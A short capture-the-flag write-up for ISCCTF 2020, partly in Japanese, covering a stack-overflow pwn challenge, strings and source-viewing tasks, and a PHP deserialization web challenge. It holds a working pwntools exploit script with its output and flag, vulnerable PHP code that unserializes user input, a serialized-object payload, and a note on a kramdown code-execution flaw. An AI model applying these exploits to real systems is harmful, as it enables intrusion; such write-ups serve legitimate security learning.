ISCCTF 2020: Write up
Pwn
stuck
from pwn import * e = ELF('./chall') #p = process('./chall') p = remote('34.84.136.181',4000) ret_addr = 0x0040101a flag_addr = e.symbols['win'] payload = 'A'*112 payload += p64(ret_addr) payload += p64(flag_addr) p.sendline(payload) p.interactive()
└─$ python main.py [*] '/home/kali/ISSCTF2020/stuck/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to 34.84.136.181 on port 4000: Done [*] Switching to interactive mode What's your name? > Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a@, I'm full stuck engineer!!!!!. ISCCTF{Y0u_kn0w_5t4ck_0v3rfl0w}
Reversing
strings
strings
コマンドを使うだけ。
Web
Greetings
/js/greet.js
のソースを見るだけ。
Yonezer
ソースを見ると
<html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="style.css"> </head> <body> <?php function html($string) { return htmlspecialchars($string); } $flag = file_get_contents("../flag.txt"); class secret{ public function data(){ global $flag; echo($flag); } } class share_video{ public $text="Hello Everone"; public function data(){ echo("<h1>" . html($this->text) . "</h1><br>"); echo("<MARQUEE><h1>Do you like this video 👀?</h1></MARQUEE>\n"); $urls = ["https://www.youtube.com/embed/s582L3gujnw","https://www.youtube.com/embed/gJX2iy6nhHc", "https://www.youtube.com/embed/SX_ViT4Ra7k","https://www.youtube.com/embed/Zw_FKq10S8M"]; $num = rand(0,3); $url = $urls[$num]; echo ("<div id=\"all\"><iframe width=\"1000\" height=\"600\" src=\"". $url . "\"></iframe></div>"); } } $serialized = @$_GET["data"]; $hoge = @unserialize($serialized); if($hoge){ $hoge->data(); } ?> </body> </html>
入力をそのままデシリアライズしてる脆弱性があることがわかる。
<?php class secret{} $a = New secret(); echo serialize($a) ?>
$ php main.php O:6:"secret":0:{}
mark damn it
ソースコードが渡されてGemfileを見てみるとgem "kramdown", "2.2.1"
と書かれてる。
調べてみると、任意のファイルを読み込んだり、任意のコードを実行できる脆弱性があるっぽい。